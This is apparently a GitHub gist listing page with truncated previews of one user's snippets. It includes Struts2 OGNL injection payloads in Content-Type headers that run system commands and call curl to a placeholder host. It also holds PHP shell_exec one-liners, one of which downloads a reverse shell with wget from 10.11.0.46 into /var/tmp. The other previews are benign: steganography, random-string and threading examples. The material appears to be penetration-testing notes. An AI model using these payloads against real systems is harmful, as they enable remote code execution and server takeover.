Jimmy jimmy-ly00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Content-Type: application/x-www-form-urlencoded%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('Jimmy',3195*5088)}.multipart/form-data | |
| Content-Type: application/x-www-form-urlencoded %{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec('curl http://IP'))} | |
| Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If you have access to executing php (and maybe LFI to visit the .php) e.g. phpLiteAdmin, but it only accepts one line so you cannot use the pentestmonkey php-reverse-shell.php | |
| 1. Use http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet in place of the one liner | |
| <?php echo shell_exec("[INSERT ONE LINER");?> | |
| 2. Guess programs on machine and use LFI to visit file | |
| <?php echo shell_exec("/usr/local/bin/wget http://10.11.0.46:8000/php-reverse-shell.php -O /var/tmp/shell.php 2>&1");?> |
jimmy-ly00
/ Least Significant Bit (simple method)
Created
September 7, 2017 12:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| with open("sample.bmp", "rb") as file: | |
| data = file.read() | |
| bits = "" | |
| for c in data: | |
| lsb = str(c & 0x1) | |
| bits += lsb |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import random | |
| from math import log, exp | |
| import string | |
| from gevent import sleep, spawn, joinall, wait | |
| from gevent.threadpool import ThreadPool | |
| def random_string(): | |
| digits = "".join( [random.choice(string.digits) for i in xrange(8)] ) | |
| chars = "".join( [random.choice(string.letters) for i in xrange(10)] ) |
jimmy-ly00
/ 1.c
Last active
June 16, 2017 11:41
Two experimental examples of dynamically creating threading per function call
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Takes input and split messages into 5 bytes. Delay each message per thread with known number of messages. Potentially | |
| // could be used as a stop-n-go mixer with an exponential distributed delay | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <pthread.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| struct delay_args { |
NewerOlder